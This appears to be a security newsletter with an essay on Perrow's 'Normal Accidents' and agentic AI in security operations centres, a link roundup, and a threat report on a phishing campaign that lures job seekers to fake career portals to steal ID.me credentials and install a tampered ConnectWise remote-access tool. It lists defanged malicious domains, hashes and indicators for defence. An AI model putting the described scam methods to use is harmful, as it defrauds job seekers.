This OWASP guide popped up on my radar this week and, yes, it’s about AI. And yes, it’s entirely predictable. But what appeals to me at the moment is its predictability amidst the nondeterminism of LLM rakestepping. Catastrophic outcomes in these complex systems are foreseeable not just from today, or the day this Adversa post was published, but at least from 1984. It was in 1984 that sociologist Charles Perrow published “Normal Accidents: Living With High-Risk Technologies.” Normal Accidents had nothing to do with artificial intelligence, yet seeing how it’s being deployed today, the book now has everything to do with it. Perrow studied major industrial accidents across much of the twentieth century and isolated some important insights on unexpected catastrophic failures inevitable enough to be called Normal Accidents:
The system is complex.
The system is tightly coupled.
The system has catastrophic potential.
In the agentic systems we see proposed and being implemented before us, certainly complexity plays an integral role - the dirty little secret of LLMs is that to make one useful, especially for a specialized expert task, you’re dealing with multiple layers of LLMs with varying levels of autonomy. It’s the sausage being made behind that single pane of glass most AI products pretend to be.
We then turn to tight coupling - essentially, complex systems producing outputs that must occur in a specific order, such as a multi-stage chemical treatment process. It is the anticipated sequence - in Perrow’s words, the invariant sequence - where B must follow A, because that is the only way to make the product - that defines tight coupling. Think about the sub-tasks each Agent is charged with; pre-prompt hardening against injection attacks, shifting tone and scope of the LLM response, providing expectations to shape system output. Above that and the primary agent doing the task, you have multiple other systems working to evaluate, validate, and re-shape output before it’s pushed to the surface agent, who relays it to you. Should those multiple subsystems interact in varied ways or orders, the output is necessarily - perhaps catastrophically - affected.
Catastrophic potential is mostly self-evident, but let us take a specific example: the modern Security Operations Center, or SOC. Perrow’s book provides multiple corollary environments - think a Nuclear Power operations center full of sensors, monitors, and potential alerts. Or the cockpit of a commercial airplane, which had seen much more automation in the decades prior to 1984 and provided starkly relevant examples of alert and attention issues at critical moments. Indeed, we see SOC failures in some of the biggest hacks on record, where alerts are missed or disregarded, leading to major systemic damage.
So in the SOC we have a complex, tightly-coupled system with catastrophic potential. “The essence of the Normal Accident,” Perrow wrote, is “the interaction of multiple failures that are not in a direct operational sequence.” That is, system components interacting in sequences and ways not only unexpected, but “incomprehensible” during the incident, often leading to much worse outcomes.
And what do we do, 42 years after Normal Accidents’ release? We add a complex, relatively tightly-coupled system of agents to a complex, certainly tightly-coupled system with catastrophic potential called the Security Operations Center. And not only that, but a system of agents fundamentally empowered by their own nondeterministic nature.
“What distinguishes these [system component] interactions,” Perrow wrote, “is that they were not designed into the system by anybody; no one intended them to be linked. They baffle us because we acted in terms of our own designs of a world that we expected to exist - but the world was different.”
In the rush to the AI/Agentic SOC, expect many Normal Accidents.
CERT Polska - Energy Sector Incident Report - If you’re reading this list, you’ve probably already seen this, but linking in case that’s untrue. Probably the best of the recent resources around the Polish energy grid incident, and worth becoming familiar with. Also good writeups by Kim Zetter here, here, and here.
UK Defence Journal - Iranian-linked Scottish accounts fall silent again - Social media accounts that posed as supporters of Scottish Independence once again fell silent amidst the Iranian internet blackout. Fun little detection, if not necessarily a fine one.
Greynoise - -f Around and Find Out: 18 Hours of Unsolicited Telnet Houseguests - Telnet? What year is it?!?! All kidding aside, Greynoise is making some fascinating moves lately, and as much of an AI skeptic as I am, hrbmstr’s experiments with AI analysis show some real value there.
APNIC - What we learned from 63,000 attacks in 12 days on APNIC Honeynet sensors at University of Dhaka - “In just twelve days, our sensor was hit 63,247 times by 4,262 unique source IPs, including five unique IP addresses from Bangladesh. Fourteen of those led to malware download attempts. The time to first attack was less than one hour, and we averaged ~5,270 attacks every single day!” - Not groundbreaking, but another eye-opening bit of research showing with data just how dangerous the internet can be, packet-wise. Good work and writeup on their part.
Phishing campaign targets job seekers with fake career portals and interview invites, stealing ID.me credentials and deploying malware since August 2025.
A malicious actor has created several domain masquerades of small companies posing as job boards, interview themes, and login pages since approximately August 2025. The activity appears to have two distinct objectives. The first is a credential harvesting scheme targeting ID.me accounts — the official identity provider for US government services like the IRS and SSA — which may then be exploited to facilitate financial fraud, including tax refund theft and fraudulent unemployment benefits. The second cluster focuses on malware delivery, tricking job seekers via fake Microsoft Teams meeting invites to download a malicious, unsigned variant of the remote access tool Connectwise. This gives the attacker access to the victim’s machine where they may conduct follow-on attacks.
Registration Commonalities
Nameserver: namecheaphosting.com
IP ISP: Namecheap Inc.
Mail Server Domain
privateemail.com
jellyfish.systems
SSL Issuer: Sectigo
Registrar: NameCheap Inc.
Server Type: Microsoft
ID.me Credential Harvesting
clock-towerrealty[.]org apply-untide[.]rentals
The site purports to be a United Rentals Careers portal and uses legitimate links and site content loaded from the real site, jobs.unitedrentals[.]com.
The two buttons on the top right for “Continue Application” and “APPLY HERE” direct to another actor owned domain, clock-towerrealty[.]org.
http[:]//clock-towerrealty[.]org/APPLY/?ff_landing=13 Continue Application https[:]//clock-towerrealty[.]org/APPLY/?ff_landing=10 APPLY HERE
The code for clock-towerrealty[.]org contains a credential harvester designed to look like a legitimate corporate portal. This appears to be a brand spoof but not a website spoof of the real entity, Clock Tower Realty in Florida, USA.
The malicious domain is using a cheaply registered WordPress site to trick job seekers into providing their email and password. Credentials being targeted are ID.me. If a scammer gets ID.me credentials, they could potentially perform unauthorized logins to steal tax refunds, apply for fraudulent unemployment benefits, or take over Social Security accounts.
When a user clicks the "Sign In" button after entering their information, the data is sent to admin-ajax.php, suggesting the stolen credentials are being stored in the WordPress SQL database.
These scammers may have taken screenshots of legitimate company logos and sent them via WhatsApp during the development of the scam, hence the file names “WhatsApp-Image”. Seeing "WhatsApp-Image" in a site's source code is a strong indicator that the site is fraudulent. Legitimate companies like United Rentals have dedicated IT departments.
The site is instrumented for marketing and behavior tracking using the Google Tag Manager (GTM) ID “GTM-T75PDC7R”,which appears on multiple other actor-controlled sites created between 2025-08 and 2026-01 that feature the same type of scam.
Other domains suspected of being in an associated cluster of activity were also identified masquerading as legitimate small company brands with job interview meeting invites. However, these domains do not simply attempt to steal credentials through fake logon pages. Instead, they deliver a malicious Windows installation file that provides remote access to the compromised machine.
Initial phishing domain: mlcrsoftedge[.]com. The site itself purports to be and links to https[:]//lsxconstructions[.]com/, a seemingly legitimate construction company website, which was created 2025-02-01 and redirects to lsxconstruction[.]com.
When users receive the meeting invite and click the "Join Meeting" button, they unknowingly initiate a download of a modified, unsigned installation file for Connectwise, a remote access tool.
Bundled files such as 7027b69ab6ebc9f3f7d2f6c800793fde2a057b76010d8cfd831cf440371b2b23 are linked to multiple reports of impersonation attacks and Connectwise phishing campaigns going back to 2025-04-23. The majority of the recent activity appears to have started around 2025-11.
Conclusion
The identified phishing activities use domain masquerades with a job theme and consist of two distinct attack types. One focuses on harvesting ID.me credentials, which are used to access government services (IRS, SSA, VA) and facilitate financial fraud. The second delivers a malicious, unsigned remote access tool (Connectwise) disguised as a Microsoft Teams link, resulting in system compromise. While there’s no definitive evidence the two clusters are linked to the same actor, the registration patterns, themes – specifically, masquerading as small companies – and timeframe appear highly correlative.
IOCs
mlcrsoftedge[.]com clock-towerrealty[.]org apply-untide[.]rentals from-unietd[.]rentals frosm-unitde[.]rentals from-united[.]rentals forms-unitde[.]rentals froms-united[.]rentals Sha256: 4107f8e0d6597866d4beb7c30718935353782dc7e199d3956fd10c8456383feb Google Tag Manager: GTM-T75PDC7R
![Screenshot of filedocx[.]homes landing page](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/6a1dd9908afb5ba03f61cb9c_c531398d.png)
![Screenshot of accounts-recruitmentportal[.]com](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/6a1dd9908afb5ba03f61cb8d_7068a80a.png)
